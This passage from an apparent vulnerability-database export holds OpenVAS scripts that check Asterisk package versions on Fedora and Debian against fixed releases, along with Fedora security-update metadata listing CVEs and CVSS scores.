Asterisk\ndoes voice over IP in three protocols, and can interoperate with\nalmost all standards-based telephony equipment using relatively\ninexpensive hardware.\n\";\n\n tag_affected = \"asterisk on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-24108\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-January/125903.html\");\n script_summary(\"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.7.0~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-31T10:49:13", "description": "Jan Juergens discovered a buffer overflow in the parser for SMS messages\nin Asterisk.\n\nAn additional change was backported, which is fully described in\nhttp://downloads.asterisk.org/pub/security/AST-2013-007.html\nWith the fix for AST-2013-007, a new configuration option was added in\norder to allow the system administrator to disable the expansion of\ndangerous \nfunctions (such as 
SHELL()) from any interface which is not\nthe dialplan. In stable and oldstable this option is disabled by default.\nTo enable it add the following line to the section '[options]' in\n/etc/asterisk/asterisk.conf (and restart asterisk)\n\nlive_dangerously = no", "cvss3": {}, "published": "2014-01-05T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2835-1 (asterisk - buffer overflow)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7100"], "modified": "2017-07-14T00:00:00", "id": "OPENVAS:702835", "href": "http://plugins.openvas.org/nasl.php?oid=702835", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2835.nasl 6724 2017-07-14 09:57:17Z teissa $\n# Auto-generated from advisory DSA 2835-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"asterisk on Debian Linux\";\ntag_insight = \"Asterisk is an Open Source PBX and telephony toolkit. 
It is, in a\nsense, middleware between Internet and telephony channels on the bottom,\nand Internet and telephony applications at the top.\";\ntag_solution = \"For the oldstable distribution (squeeze), this problem has been fixed in\nversion 1:1.6.2.9-2+squeeze12.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1:1.8.13.1~dfsg1-3+deb7u3.\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 1:11.7.0~dfsg-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:11.7.0~dfsg-1.\n\nWe recommend that you upgrade your asterisk packages.\";\ntag_summary = \"Jan Juergens discovered a buffer overflow in the parser for SMS messages\nin Asterisk.\n\nAn additional change was backported, which is fully described in\nhttp://downloads.asterisk.org/pub/security/AST-2013-007.htmlWith the fix for AST-2013-007, a new configuration option was added in\norder to allow the system adminitrator to disable the expansion of\ndangerous \nfunctions (such as SHELL()) from any interface which is not\nthe dialplan. 
In stable and oldstable this option is disabled by default.\nTo enable it add the following line to the section '[options]' in\n/etc/asterisk/asterisk.conf (and restart asterisk)\n\nlive_dangerously = no\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702835);\n script_version(\"$Revision: 6724 $\");\n script_cve_id(\"CVE-2013-7100\");\n script_name(\"Debian Security Advisory DSA 2835-1 (asterisk - buffer overflow)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-14 11:57:17 +0200 (Fri, 14 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-01-05 00:00:00 +0100 (Sun, 05 Jan 2014)\");\n script_tag(name: \"cvss_base\", value:\"5.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2835.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.6.2.9-2+squeeze12\", 
rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-h323\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-sounds-main\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dahdi\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mobile\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-modules\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mp3\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mysql\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"asterisk-ooh323\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail-imapstorage\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail-odbcstorage\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dahdi\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mobile\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-modules\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mp3\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mysql\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-ooh323\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"asterisk-voicemail\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail-imapstorage\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail-odbcstorage\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dahdi\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mobile\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-modules\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mp3\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mysql\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-ooh323\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"asterisk-voicemail-imapstorage\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail-odbcstorage\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dahdi\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mobile\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-modules\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mp3\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mysql\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-ooh323\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail-imapstorage\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"asterisk-voicemail-odbcstorage\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:18", "description": "The remote host is missing an update for the 'asterisk' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2013-04-08T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-4566", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2685"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310865535", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865535", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-4566\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.865535\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-04-08 10:33:14 +0530 (Mon, 08 Apr 2013)\");\n script_cve_id(\"CVE-2013-2685\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-4566\");\n script_xref(name:\"FEDORA\", value:\"2013-4566\");\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101614.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n script_tag(name:\"affected\", value:\"asterisk on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.2.2~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-23T13:10:08", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2013-04-08T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-4566", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2685"], "modified": "2018-01-23T00:00:00", "id": "OPENVAS:865535", "href": "http://plugins.openvas.org/nasl.php?oid=865535", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-4566\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"asterisk on Fedora 18\";\ntag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\n all of the features you would expect from a PBX and more. 
Asterisk\n does voice over IP in three protocols, and can interoperate with\n almost all standards-based telephony equipment using relatively\n inexpensive hardware.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(865535);\n script_version(\"$Revision: 8494 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 07:57:55 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-04-08 10:33:14 +0530 (Mon, 08 Apr 2013)\");\n script_cve_id(\"CVE-2013-2685\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-4566\");\n\n script_xref(name: \"FEDORA\", value: \"2013-4566\");\n script_xref(name: \"URL\" , value: \"http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101614.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.2.2~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. ", "cvss3": {}, "published": "2013-09-14T02:35:21", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: asterisk-11.5.1-2.fc18", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2013-09-14T02:35:21", "id": "FEDORA:ADB8421654", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/2RZ5C3AZZZJ4AS7OIR6XAFFWDQJASRDJ/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. 
", "cvss3": {}, "published": "2013-09-14T02:37:45", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: asterisk-11.5.1-2.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2013-09-14T02:37:45", "id": "FEDORA:6763920EE9", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/B34ZJSP7C7DUTOFWVJXXOADTS75M6XN4/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. 
", "cvss3": {}, "published": "2013-01-30T00:55:24", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: asterisk-1.8.20.0-1.fc16", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2013-01-30T00:55:24", "id": "FEDORA:A1E1F217E8", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/6KORRUEWBW6LIMHZK57YJUOTHNNJVQ63/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. 
", "cvss3": {}, "published": "2013-01-30T00:36:44", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: asterisk-10.12.0-1.fc17", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2013-01-30T00:36:44", "id": "FEDORA:3F08C21512", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/IE3NNSWZPPLU7VGPTBXX423EHLKWCNQQ/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. 